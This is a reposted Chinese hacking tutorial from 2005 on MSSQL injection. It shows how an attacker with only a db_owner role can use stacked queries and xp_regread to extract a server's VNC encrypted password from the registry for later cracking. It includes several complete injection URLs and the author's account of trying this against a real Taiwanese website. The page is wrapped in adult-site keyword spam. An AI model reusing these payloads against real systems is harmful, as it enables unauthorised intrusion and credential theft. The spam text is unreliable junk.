国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關(guān)注微信公眾號(hào)

MSSQL db_owner角色注入直接獲得系統(tǒng)權(quán)限
2005-12-17   

相信大家對(duì)ASP+MSSQL注入都已經(jīng)很熟悉了,連一個(gè)對(duì)SQL語(yǔ)法絲毫不懂的人也可以用NBSI來(lái)輕松入侵大量網(wǎng)站。但就算是一個(gè)SQL INJECTION高手,如果針對(duì)在MSSQL中只有db_owner角色,破不出猜不到網(wǎng)站后臺(tái)的情況下,好像也無(wú)技可施;除了用備份得到shell的這個(gè)思路,我在網(wǎng)上實(shí)在沒(méi)有找出更好的入侵辦法。不過(guò),備份得到的shell只是理論化的東東,如果一個(gè)webshell有20mb的話,你還能用它嗎?前不久,我就碰到了這樣的一個(gè)臺(tái)灣網(wǎng)站,管理員的密碼倒是用NBSi跑了出來(lái),可是用戶名因?yàn)槭欠斌w的原因在NBSi中成了一堆亂碼。我也找到了后臺(tái),可只有干瞪眼的份。怎么辦?我又掃了它的所有端口,發(fā)現(xiàn)開(kāi)了5900,估計(jì)是管理員用了VNC對(duì)服務(wù)器進(jìn)行了遠(yuǎn)程控制。這時(shí),我就有一個(gè)思路,能不能把 VNC在注冊(cè)表的加密密碼讀出來(lái)再來(lái)破解呢?看我表演吧!
TELNET服務(wù)器的5900端口,得到訊息證實(shí)服務(wù)器的確用的是VNC。
相信大家都會(huì)用讀xp_regread來(lái)讀注冊(cè)表了,依次提交如下語(yǔ)句:
http://www.something.com/script.asp?id=2;create table [dbo].[cyfd] ([gyfd][char](255));
這樣我們就成功地建了一個(gè)名為cyfd的表,并且添加了類型是char,長(zhǎng)度為255的字段名gyfd。然后向表中加數(shù)據(jù):
_blank>http://www.something.com/script.asp?id=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread HKEY_CURRENT_USER,Software\ORL\WinVNC3, Password, @result output insert into cyfd (gyfd) values(@result);--
從注冊(cè)表中讀出VNC在注冊(cè)表的加密密碼的值,再把值插入到剛建的表中。然后暴出VNC在注冊(cè)表的加密密碼:
_blank>http://www.something.com/script.asp?id=2 and 1=(select count(*) from cyfd where gyfd > 1)。
可是結(jié)果大失我所望,gyfd的值是空的。如果這樣容易的話,不會(huì)有這篇文章出現(xiàn)了。這是什么原因呢?我的語(yǔ)法不正確?翻來(lái)覆去的檢查我的語(yǔ)句也沒(méi)有發(fā)現(xiàn)錯(cuò)誤呀。難道繁體的vnc在注冊(cè)表里的位置不一樣?后來(lái)我又開(kāi)始在本機(jī)裝了vnc又在分析查循器里做測(cè)試,得到的結(jié)果卻是個(gè)數(shù)字5。這時(shí)czy上線了,詢問(wèn)了一下,他勸我把gyfd的這個(gè)字段改成二進(jìn)制數(shù)據(jù)類型 binary來(lái)試一下。于是我又在本機(jī)測(cè)試了一下,依次提交如下語(yǔ)句:
 http://127.0.0.1/script.asp?id=2;create table [dbo].[cyfd] ([gyfd][binary](20));
http://127.0.0.1/script.asp?id=2;DECLARE @result binary(20) EXEC master.dbo.xp_regread HKEY_CURRENT_USER,Software\ORL\WinVNC3, Password, @result output insert into cyfd (gyfd) values(@result);--
然后我再用nbsi跑出cyfd表里gyfd這個(gè)字段的值。結(jié)果到是出來(lái)了,得到了vnc的加密密碼值是 0x0E3515AC00000000000000000000000000000000。可這兒還不對(duì),我在本機(jī)裝的vnc在注冊(cè)表里的密碼值是 hex:0e,35,15,ac,00,62,d3,08這個(gè)呀。原來(lái)binary(n)的數(shù)據(jù)存儲(chǔ)長(zhǎng)度是固定的,當(dāng)輸入的二進(jìn)制長(zhǎng)度小于n時(shí),余下長(zhǎng)度填0補(bǔ)充。我在注入語(yǔ)句中寫(xiě)入的binary(20)是足夠?qū)懭雟nc加密密碼的長(zhǎng)度時(shí),為什么還有那么多0來(lái)填充呢?這是因?yàn)檎梦业膙nc密碼是 0e3515ac0062d308,在碰到了00的情況下,xp_regread以為已經(jīng)讀完了它的值呢,把00當(dāng)成了結(jié)束符,所以只讀到了 0x0E3515AC,我暈!
翻了一下書(shū),終于讓我找到了一個(gè)特殊的數(shù)據(jù)類型uniqueidentifier,是用來(lái)存儲(chǔ)一個(gè)16字節(jié)長(zhǎng)的二進(jìn)制數(shù)據(jù)類型。把注入語(yǔ)句改造一下:
 http://127.0.0.1/script.asp?id=2;create table [dbo].[cyfd] ([gyfd][uniqueidentifier]);
 http://127.0.0.1/script.asp?id=2;DECLARE @result uniqueidentifier EXEC master.dbo.xp_regread HKEY_CURRENT_USER,Software\ORL\WinVNC3, Password, @result output insert into cyfd (gyfd) values(@result);--
然后再用nbsi跑一下,跑出來(lái)了,不過(guò)得到的結(jié)果是AC15350E-6200-08D3-0000-000000000000。
AC15350E-6200-08D3-0000-000000000000和我在注冊(cè)表里的正確的vnc密碼的值0e3515ac0062d308 相比,能看出來(lái)有什么不同嗎?只不過(guò)順序是顛倒的,相信大家都會(huì)小學(xué)的算術(shù),這個(gè)不用我教了。試一下用cain破出vnc的密碼,看看行不行。
看樣子在本機(jī)做的測(cè)試一切成功。這方法用到臺(tái)灣上的站點(diǎn)試試,哎,依然沒(méi)有跑出vnc的密碼,也許繁體vnc在注冊(cè)表的位置不同吧。不過(guò),我研究了一上午,有了一點(diǎn)收獲,就放過(guò)你吧。

熱詞搜索:

上一篇:phparticle 2.0注入漏洞測(cè)試分析
下一篇:標(biāo)準(zhǔn)SQL注入入侵語(yǔ)句

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
黄色欧美日韩| 久久精品国产一区二区三| 久久精品色图| 欧美日韩a区| 国模吧视频一区| 99成人精品| 国产欧美日韩亚洲精品| 性欧美长视频| 亚洲二区三区四区| 欧美成人精品在线视频| 亚洲日韩欧美视频一区| 欧美激情精品| 红桃视频成人| 欧美91大片| 亚洲免费观看视频| 国产视频在线观看一区二区三区| 欧美一区二区三区喷汁尤物| 亚洲精品免费一区二区三区| 欧美美女福利视频| 亚洲人成在线播放| 国产欧美日韩综合精品二区| 久久成人精品电影| 一本一本久久a久久精品综合妖精 一本一本久久a久久精品综合麻豆 | 欧美色欧美亚洲另类二区| 亚洲精品影视| 欧美日韩一二区| 久久久亚洲欧洲日产国码αv| 在线观看欧美视频| 欧美伦理影院| 久久亚洲国产成人| 在线亚洲免费| 亚洲第一伊人| 国产精品久久久久aaaa樱花 | 亚洲黄网站黄| 国产亚洲午夜| 欧美大片免费观看| 久久精品亚洲热| 亚洲精品乱码久久久久久久久| 欧美日韩日日骚| 免费日韩av| 亚洲免费视频观看| 农夫在线精品视频免费观看| 亚洲在线播放| 亚洲国产精品传媒在线观看 | 欧美精品日韩一本| 久久看片网站| 亚洲资源av| 亚洲日本理论电影| 国产欧美日韩综合精品二区| 午夜精品福利在线| 91久久精品日日躁夜夜躁国产| 国产精品久久久久aaaa| 欧美日韩视频在线观看一区二区三区| 久久国产精品黑丝| 欧美一二区视频| 亚洲少妇诱惑| 亚洲欧洲一区| 亚洲国产精品va在线看黑人| 国产伦精品一区二区三区视频孕妇 | 欧美激情精品久久久久久黑人 | 久久精品系列| 亚洲一区二区视频在线观看| 亚洲国产天堂久久综合| 亚洲成色777777在线观看影院| 国产精品美女在线观看| 国产精品欧美久久久久无广告| 欧美国产一区二区在线观看| 久久久精品一品道一区| 欧美有码视频| 欧美一级大片在线观看| 欧美韩日精品| 欧美电影打屁股sp| 久久av资源网| 国产欧美一区二区三区在线看蜜臀| 欧美国产日本韩| 国产亚洲精久久久久久| 精品不卡视频| 精品福利电影| 欧美午夜在线一二页| 欧美在线短视频| 欧美成人综合在线| 亚洲国产成人精品女人久久久| 久久av红桃一区二区小说| 国产亚洲欧洲| 欧美片第1页综合| 久久久久久久精| 国产精品免费视频xxxx| 欧美一区二区三区的| 国模套图日韩精品一区二区| 国产精品女人久久久久久| 欧美日韩一区国产| 黄色成人精品网站| 麻豆精品视频在线观看| 国产精品专区h在线观看| 欧美视频一区| 亚洲免费在线| 亚洲激情一区二区| 亚洲国产欧美一区二区三区久久| 国产欧美韩日| 欧美福利一区二区| 在线国产精品播放| 国产一区91精品张津瑜| 久久久久一区二区| 性18欧美另类| 亚洲欧美日韩视频一区| 欧美一区二区三区在线视频 | 亚洲精品国产精品乱码不99| 亚洲欧洲日本一区二区三区| 一二三区精品福利视频| 欧美一区二区视频免费观看| 久久久久国产成人精品亚洲午夜| 免费91麻豆精品国产自产在线观看| 免费亚洲视频| 国产精品黄色| 亚洲人成小说网站色在线| 亚洲欧美第一页| 欧美高清视频一区二区| 国产麻豆午夜三级精品| 亚洲国产高清一区| 亚洲一区二区三区精品在线观看 | 亚洲最新视频在线播放| 9久re热视频在线精品| 亚洲欧美日韩区| 欧美成人综合网站| 国产亚洲综合精品| 99xxxx成人网| 美国成人毛片| 国产亚洲一区精品| 亚洲午夜成aⅴ人片| 欧美高清不卡在线| 在线观看不卡| 久久国内精品自在自线400部| 欧美国产在线观看| 国产资源精品在线观看| 中文久久精品| 欧美日韩国产在线观看| 精品成人在线视频| 一本色道久久综合亚洲91| 国产亚洲精品一区二555| 久久国产免费看| 欧美精品一区二区三| 亚洲一区二区三区四区视频| 亚洲视频专区在线| 久久精品综合| 欧美国产高清| 国产日韩精品久久久| 在线视频一区观看| 欧美激情久久久| 欧美大片在线看免费观看| 国产亚洲欧美中文| 久久久久88色偷偷免费| 国产日韩欧美综合在线| 亚洲一区三区视频在线观看 | 含羞草久久爱69一区| 先锋影音国产一区| 国产精品入口福利| 亚洲男人第一av网站| 国产精品羞羞答答| 亚洲综合色婷婷| 国产精品视频网站| 欧美一区二区三区久久精品茉莉花 | 欧美成人dvd在线视频| 伊人激情综合| 蜜桃精品一区二区三区| 在线观看欧美视频| 欧美xx69| 一区二区三区四区五区视频 | 久久er99精品| 狠狠久久亚洲欧美专区| 久久深夜福利免费观看| 在线成人av.com| 欧美日本一区| 最新日韩精品| 欧美精品手机在线| 中文国产成人精品| 久久国产婷婷国产香蕉| **网站欧美大片在线观看| 久久综合给合久久狠狠狠97色69| 亚洲成人在线免费| 欧美日本亚洲| 欧美专区日韩视频| 国产午夜精品久久| 久久视频一区| 亚洲婷婷在线| 在线观看久久av| 欧美了一区在线观看| 午夜精品区一区二区三| 狠狠色狠狠色综合日日五| 欧美大片在线看免费观看| 亚洲日本成人网| 在线精品一区二区| 欧美日韩在线播放| 蜜臀va亚洲va欧美va天堂| 在线亚洲精品福利网址导航| 国产区日韩欧美| 欧美精品在线播放| 香蕉亚洲视频| 亚洲久久一区二区| 国产一区二区三区四区hd| 欧美日韩亚洲一区|